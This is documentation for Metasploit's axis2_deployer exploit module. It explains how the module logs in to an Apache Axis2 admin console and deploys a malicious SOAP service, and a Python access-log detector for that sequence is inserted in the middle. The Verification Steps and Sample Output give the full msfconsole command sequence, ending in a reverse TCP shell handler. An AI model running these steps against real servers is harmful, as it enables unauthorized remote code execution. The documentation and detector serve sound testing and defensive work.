metasploit-gs/documentation/modules/exploit/multi/http/axis2_deployer.md
2017-03-24 21:14:56 +05:30


Description

This module logs in to an Axis2 Web Admin Module instance with a specified username and password, then uploads and executes commands by deploying a malicious web service, using SOAP.

Axis2 Web Admin

The Apache Axis2 Web application has three main sections: 'Services' lists all the available services deployed on this server; 'Validate' checks the system to see whether all the required libraries are in place and shows the system information; and 'Administration' is the Axis2 Web Administration module, the console for administering the Apache Axis2 installation. The Axis2 Web Administration module provides a way to configure Axis2 dynamically.

IMPORTANT: This dynamic configuration will NOT be persistent, i.e., if the servlet container is restarted, then all the dynamic configuration changes will be lost.
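For defenders, the login-then-deploy sequence in the Description leaves a recognizable trail in the servlet container's access log. The following is an added example, not part of the module or its documentation: it assumes combined-format access logs and the Axis2 admin console's `axis2-admin/login` and `axis2-admin/upload` paths under the application path (the module's PATH option); the log lines, addresses and the service name `ExampleSvc` are constructed.

```python
import re
from datetime import datetime, timedelta

# Constructed sample access-log lines (combined log format), not from the page.
SAMPLE_LOG = """\
192.0.2.10 - - [24/Mar/2017:10:00:01 +0000] "GET /axis2/services/listServices HTTP/1.1" 200 5120
198.51.100.7 - - [24/Mar/2017:10:02:11 +0000] "POST /axis2/axis2-admin/login HTTP/1.1" 200 2048
198.51.100.7 - - [24/Mar/2017:10:02:12 +0000] "POST /axis2/axis2-admin/upload HTTP/1.1" 200 1830
198.51.100.7 - - [24/Mar/2017:10:02:20 +0000] "POST /axis2/services/ExampleSvc HTTP/1.1" 200 412
203.0.113.5 - - [24/Mar/2017:11:15:00 +0000] "POST /axis2/axis2-admin/login HTTP/1.1" 200 2048
203.0.113.5 - - [24/Mar/2017:11:15:30 +0000] "GET /axis2/axis2-admin/listService HTTP/1.1" 200 7001
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
STAGES = ("login", "upload", "invoke")  # order a deployment chain must follow

def classify(method, uri, base="/axis2"):
    """Map a request to a chain stage, or None if it is unrelated."""
    path = uri.split("?", 1)[0]
    if method == "POST" and path == base + "/axis2-admin/login":
        return "login"
    if method == "POST" and path == base + "/axis2-admin/upload":
        return "upload"
    return "invoke" if path.startswith(base + "/services/") else None

def find_deploy_chains(log_text, window=timedelta(minutes=5), base="/axis2"):
    """Return (client, chain_start, service_uri) for each client that posts an
    admin login, uploads a service archive and then calls a service in window."""
    progress, alerts = {}, []  # progress: client -> (next stage index, start time)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        stage = classify(m.group(3), m.group(4), base) if m else None
        if stage is None:
            continue
        client = m.group(1)
        when = datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S %z")
        if stage == "login":  # every admin login restarts the chain
            progress[client] = (1, when)
            continue
        idx, start = progress.get(client, (0, when))
        if idx == 0 or stage != STAGES[idx] or when - start > window:
            continue  # ordinary service traffic, out of order, or too late
        if idx == 2:
            alerts.append((client, start.isoformat(), uri := m.group(4)))
            del progress[client]
        else:
            progress[client] = (idx + 1, start)
    return alerts
```

Pass `base="/dswsbobje"` for SAP BusinessObjects deployments, matching the alternative PATH value shown in the module options. The log does not show whether a login succeeded, so a hit is a lead to check against the list of deployed services rather than proof of compromise.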

Verification Steps

  1. Do: use exploit/multi/http/axis2_deployer
  2. Do: set RHOSTS [IP]
  3. Do: set RPORT [PORT]
  4. Do: set USERNAME [Username]
  5. Do: set PASSWORD [Password]
  6. Do: run

Sample Output

msf > use exploit/multi/http/axis2_deployer
msf exploit(axis2_deployer) > set RHOST 10.10.155.37
RHOST => 10.10.155.37
msf exploit(axis2_deployer) > set RPORT 8080
RPORT => 8080
msf exploit(axis2_deployer) > set USERNAME admin
USERNAME => admin
msf exploit(axis2_deployer) > set PASSWORD admin123
PASSWORD => admin123
msf exploit(axis2_deployer) > show options

Module options (exploit/multi/http/axis2_deployer):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  admin123         no        The password for the specified username
   PATH      /axis2           yes       The URI path of the axis2 app (use /dswsbobje for SAP BusinessObjects)
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST     10.10.155.37     yes       The target address
   RPORT     8080             yes       The target port
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   USERNAME  admin            no        The username to authenticate as
   VHOST                      no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Java

msf exploit(axis2_deployer) > exploit

[*] Started reverse TCP handler on 10.10.155.39:4444